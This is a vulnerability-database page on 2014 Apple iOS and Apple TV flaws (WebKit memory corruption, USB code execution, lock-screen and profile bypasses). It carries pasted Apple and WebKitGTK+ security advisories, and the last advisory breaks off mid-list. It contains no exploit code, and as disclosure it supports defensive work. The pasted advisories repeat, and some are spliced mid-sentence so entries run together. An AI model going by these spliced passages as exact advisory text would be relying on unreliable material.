VARIoT IoT vulnerabilities database
| VAR-201403-0265 | CVE-2014-1286 | Apple iOS of SpringBoard Service disruption on lock screen (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
SpringBoard Lock Screen in Apple iOS before 7.1 allows remote attackers to cause a denial of service (lock-screen hang) by leveraging a state-management error. Supplementary information : CWE Vulnerability type by CWE-361: Time and State ( Time and status ) Has been identified. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attack, to access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation
| VAR-201403-0264 | CVE-2014-1285 | Apple iOS of Springboard Vulnerable to access restrictions |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Springboard in Apple iOS before 7.1 allows physically proximate attackers to bypass intended access restrictions and read the home screen by leveraging an application crash during activation of an unactivated device. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attack, to access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation
| VAR-201403-0267 | CVE-2014-1289 | Apple iOS and Apple TV Used in etc. WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit, as used in Apple iOS before 7.1 and Apple TV before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2014-1290, CVE-2014-1291, CVE-2014-1292, CVE-2014-1293, and CVE-2014-1294. Apple iOS and Apple TV Used in etc. WebKit is prone to multiple memory-corruption vulnerabilities.
An attacker can exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
CVE-ID
CVE-2014-1297 : Ian Beer of Google Project Zero
For OS X Mavericks and OS X Mountain Lion systems, Safari 7.0.3
and Safari 6.1.3 may be obtained from Mac App Store.
For OS X Lion systems Safari 6.1.3 is available via the Apple
Software Update application. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-2 Apple TV 6.1
Apple TV 6.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with access to an Apple TV may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-1279 : David Schuetz working at Intrepidus Group
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvfAAoJEPefwLHPlZEw8GEP/ikatTiohUPRvpjubarcXePV
z6ixKxmqUUvSy+AlyFTsCpvB1IEipSx5hKbYsxk5+4qAVsYG3VEpLNJKBarUHQN8
K1+I77xF5osLxrypWV6vEDqqFDcZyflumtvfdj7EmWf/FcWnOooRQt7wVVrzrCCh
40nfspy1YjNi1EO2p6dDlzi+yvEGF5CHg8R1zSFf7ozLPoCABlnbdzXxh+nYoI+E
y65R4Eo7OBhVH5mJvBczjsHu/GljR3y/yi3NSnoV5ga5SfaaOlwa8emgNooeEs3u
ghkfm2UxkjtdNkpVMfwFp35oLESIl6pMd2dtH2sU4MwRK3h8rvFeS/zJRZmwEIXO
5+9tNop1hmF52aVKRZAJ4/A9kbTC3pKd0PxvKsveB6Pgxbq9eDfueMC/r6FtOZDa
is95LuLtf26h8xQt8FovY7Cm80ckOT4mJnvzfmpGmUSK4PHsNfJwfJOBa1yMHTJg
CDfg+jGhHy7DJuawekzQjcvkz34YWg7Lp25ZJilvZf8dGB2R4g+hikdOrWKI4vFj
x7LGZg6IPaHFt0MPgjnoV1FhABnXksD41uIAQP2LhDrHWnRgTeJoGwQ2SuZjSA6w
T/DzhicTLq6MDSBjlbt6EJ4gtxWlYDfeAfJcFb/Aret+2L7570q18EkLRbiI8e6k
3NksAqBIKSpadFt+M8wt
=xjrI
-----END PGP SIGNATURE-----
| VAR-201403-0261 | CVE-2014-1281 | Apple iOS Vulnerabilities in capturing important image data in photo backend |
CVSS V2: 1.9 CVSS V3: - Severity: LOW |
Photos Backend in Apple iOS before 7.1 does not properly manage the asset-library cache during deletions, which allows physically proximate attackers to obtain sensitive photo data by launching the Photos app and looking under a transparent image. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attack, to access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation. The vulnerability is due to the program deleting images from the library and not deleting the cached version of the image. An attacker could exploit this vulnerability to obtain sensitive photo data
| VAR-201403-0266 | CVE-2014-1287 | Apple iOS and Apple TV of USB Vulnerability in arbitrary code execution on host |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
USB Host in Apple iOS before 7.1 and Apple TV before 6.1 allows physically proximate attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted USB messages. Apple iOS and TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
The following products are vulnerable:
Apple iOS versions prior to 7.1
Apple TV versions prior to 6.1. The vulnerability is caused by memory corruption when the program processes USB information. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-2 Apple TV 6.1
Apple TV 6.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with access to an Apple TV may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-1279 : David Schuetz working at Intrepidus Group
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
WebKit
Available for: Apple TV 2nd generation and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvfAAoJEPefwLHPlZEw8GEP/ikatTiohUPRvpjubarcXePV
z6ixKxmqUUvSy+AlyFTsCpvB1IEipSx5hKbYsxk5+4qAVsYG3VEpLNJKBarUHQN8
K1+I77xF5osLxrypWV6vEDqqFDcZyflumtvfdj7EmWf/FcWnOooRQt7wVVrzrCCh
40nfspy1YjNi1EO2p6dDlzi+yvEGF5CHg8R1zSFf7ozLPoCABlnbdzXxh+nYoI+E
y65R4Eo7OBhVH5mJvBczjsHu/GljR3y/yi3NSnoV5ga5SfaaOlwa8emgNooeEs3u
ghkfm2UxkjtdNkpVMfwFp35oLESIl6pMd2dtH2sU4MwRK3h8rvFeS/zJRZmwEIXO
5+9tNop1hmF52aVKRZAJ4/A9kbTC3pKd0PxvKsveB6Pgxbq9eDfueMC/r6FtOZDa
is95LuLtf26h8xQt8FovY7Cm80ckOT4mJnvzfmpGmUSK4PHsNfJwfJOBa1yMHTJg
CDfg+jGhHy7DJuawekzQjcvkz34YWg7Lp25ZJilvZf8dGB2R4g+hikdOrWKI4vFj
x7LGZg6IPaHFt0MPgjnoV1FhABnXksD41uIAQP2LhDrHWnRgTeJoGwQ2SuZjSA6w
T/DzhicTLq6MDSBjlbt6EJ4gtxWlYDfeAfJcFb/Aret+2L7570q18EkLRbiI8e6k
3NksAqBIKSpadFt+M8wt
=xjrI
-----END PGP SIGNATURE-----
| VAR-201403-0262 | CVE-2014-1282 | Apple iOS and Apple TV Vulnerability that can prevent the request to display the configuration profile in the profile component |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
The Profiles component in Apple iOS before 7.1 and Apple TV before 6.1 allows attackers to bypass intended configuration-profile visibility requirements via a long name. Apple iOS and TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-2 Apple TV 6.1
Apple TV 6.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with access to an Apple TV may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-1279 : David Schuetz working at Intrepidus Group
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
WebKit
Available for: Apple TV 2nd generation and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvfAAoJEPefwLHPlZEw8GEP/ikatTiohUPRvpjubarcXePV
z6ixKxmqUUvSy+AlyFTsCpvB1IEipSx5hKbYsxk5+4qAVsYG3VEpLNJKBarUHQN8
K1+I77xF5osLxrypWV6vEDqqFDcZyflumtvfdj7EmWf/FcWnOooRQt7wVVrzrCCh
40nfspy1YjNi1EO2p6dDlzi+yvEGF5CHg8R1zSFf7ozLPoCABlnbdzXxh+nYoI+E
y65R4Eo7OBhVH5mJvBczjsHu/GljR3y/yi3NSnoV5ga5SfaaOlwa8emgNooeEs3u
ghkfm2UxkjtdNkpVMfwFp35oLESIl6pMd2dtH2sU4MwRK3h8rvFeS/zJRZmwEIXO
5+9tNop1hmF52aVKRZAJ4/A9kbTC3pKd0PxvKsveB6Pgxbq9eDfueMC/r6FtOZDa
is95LuLtf26h8xQt8FovY7Cm80ckOT4mJnvzfmpGmUSK4PHsNfJwfJOBa1yMHTJg
CDfg+jGhHy7DJuawekzQjcvkz34YWg7Lp25ZJilvZf8dGB2R4g+hikdOrWKI4vFj
x7LGZg6IPaHFt0MPgjnoV1FhABnXksD41uIAQP2LhDrHWnRgTeJoGwQ2SuZjSA6w
T/DzhicTLq6MDSBjlbt6EJ4gtxWlYDfeAfJcFb/Aret+2L7570q18EkLRbiI8e6k
3NksAqBIKSpadFt+M8wt
=xjrI
-----END PGP SIGNATURE-----
| VAR-201403-0270 | CVE-2014-1292 | Apple iOS and Apple TV Used in etc. Webkit Vulnerabilities in arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit, as used in Apple iOS before 7.1 and Apple TV before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2014-1289, CVE-2014-1290, CVE-2014-1291, CVE-2014-1293, and CVE-2014-1294. Apple iOS and Apple TV Used in etc. WebKit is prone to multiple memory-corruption vulnerabilities.
An attacker can exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-04-01-1 Safari 6.1.3 and Safari 7.0.3
Safari 6.1.3 and Safari 7.0.3 are now available and address the
following:
WebKit
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling. This issue was addressed through additional
validation of IPC messages.
CVE-ID
CVE-2014-1297 : Ian Beer of Google Project Zero
For OS X Mavericks and OS X Mountain Lion systems, Safari 7.0.3
and Safari 6.1.3 may be obtained from Mac App Store.
For OS X Lion systems Safari 6.1.3 is available via the Apple
Software Update application.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTOwlLAAoJEPefwLHPlZEwmPYP/AoGVbrVVEQfbWZ/OMER6jCR
bDN4ykWdExJFRKr972tsirke9mLrDX1Flqg3jYpqrna6lWsZxk1wA/IXy4TRG97O
mpA75r7853lCJ482h5XImTdv6wWqMfTTNR1YzsK+TCLZA3sDlByQ4yshwGWhOf1Q
nY+hPpaC05PEmPeNKMWw6PA9IgA9e84uy0b/3+c2acOUZ9aAYEXmydPySY+5uYLa
ecXjvee83LVTu8Pq2/C9yCJ1kI1EMix6Q3CTb2Cv/Dtgu1q7rZMG7qKieFpMKO2J
xM7RYm1qPNlZ4hf+ZPX+D4+k6g2sZMqYdocdG1qXubk8m314CinHajdsZH9jXDHO
01gnYeMRp2IUBJlClQ7mPyIveJqJV9XpzvMTciuTVEuhzWhMaazzly8dp+8NCu4Q
QShPJKqAq16ACJqqOarwo8xaSumZ3UcKhVrD0Gxo1/dhzO1Hy52yo7WrWLaOVH89
bXPeVMfYIF0V9xysbixNmBIEro0mYDuor/XlXBFicZAjmyGEVE04K4UjenMeDoYO
/1A2zaVyM9MD50y+X/rFErtz2cj7uNcZ1XSNqPdGameoti5WvvoRbKs/D/H7E8bX
p8JDoVJoy46fOBfwNv6eaQYTGYzgtdoEtmTKL3zDauQC1bxI1Jwtma07S97D2SyJ
urMcI/V2h8JnGD4sS/7L
=kHuK
-----END PGP SIGNATURE-----
. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2015-0001
------------------------------------------------------------------------
Date reported : January 26, 2015
Advisory ID : WSA-2015-0001
Advisory URL : http://webkitgtk.org/security/WSA-2015-0001.html
Affected versions : 2.4 series before 2.4.1, 2.4.2 and 2.4.8.
CVE identifiers : CVE-2013-2871, CVE-2014-1292, CVE-2014-1298,
CVE-2014-1299, CVE-2014-1300, CVE-2014-1303,
CVE-2014-1304, CVE-2014-1305, CVE-2014-1307,
CVE-2014-1308, CVE-2014-1309, CVE-2014-1311,
CVE-2014-1313, CVE-2014-1713, CVE-2014-1297,
CVE-2013-2875, CVE-2013-2927, CVE-2014-1323,
CVE-2014-1326, CVE-2014-1329, CVE-2014-1330,
CVE-2014-1331, CVE-2014-1333, CVE-2014-1334,
CVE-2014-1335, CVE-2014-1336, CVE-2014-1337,
CVE-2014-1338, CVE-2014-1339, CVE-2014-1341,
CVE-2014-1342, CVE-2014-1343, CVE-2014-1731,
CVE-2014-1346, CVE-2014-1344, CVE-2014-1384,
CVE-2014-1385, CVE-2014-1387, CVE-2014-1388,
CVE-2014-1389, CVE-2014-1390.
Several vulnerabilities were discovered on the 2.4 stable series of
WebKitGTK+.
CVE-2013-2871
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to miaubiz.
CVE-2014-1292
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1298
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1299
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team, Apple, Renata Hodovan of
University of Szeged / Samsung Electronics.
CVE-2014-1300
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Ian Beer of Google Project Zero working with HP's Zero Day
Initiative.
CVE-2014-1303
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to KeenTeam working with HP's Zero Day Initiative.
CVE-2014-1304
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
CVE-2014-1305
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
CVE-2014-1307
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1308
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1309
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to cloudfuzzer.
CVE-2014-1311
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1313
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Google Chrome Security Team.
CVE-2014-1713
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to VUPEN working with HP's Zero Day Initiative.
CVE-2014-1297
Versions affected: WebKitGTK+ 2.4.X before 2.4.1.
Credit to Ian Beer of Google Project Zero.
WebKit, as used in Apple Safari before 6.1.3 and 7.x before 7.0.3,
does not properly validate WebProcess IPC messages, which allows
remote attackers to bypass a sandbox protection mechanism and read
arbitrary files by leveraging WebProcess access.
CVE-2013-2875
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to miaubiz.
core/rendering/svg/SVGInlineTextBox.cpp in the SVG implementation in
Blink, as used in Google Chrome before 28.0.1500.71, allows remote
attackers to cause a denial of service (out-of-bounds read) via
unspecified vectors.
CVE-2013-2927
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to cloudfuzzer.
CVE-2014-1323
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to banty.
CVE-2014-1326
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1329
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1330
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1331
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to cloudfuzzer.
CVE-2014-1333
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1334
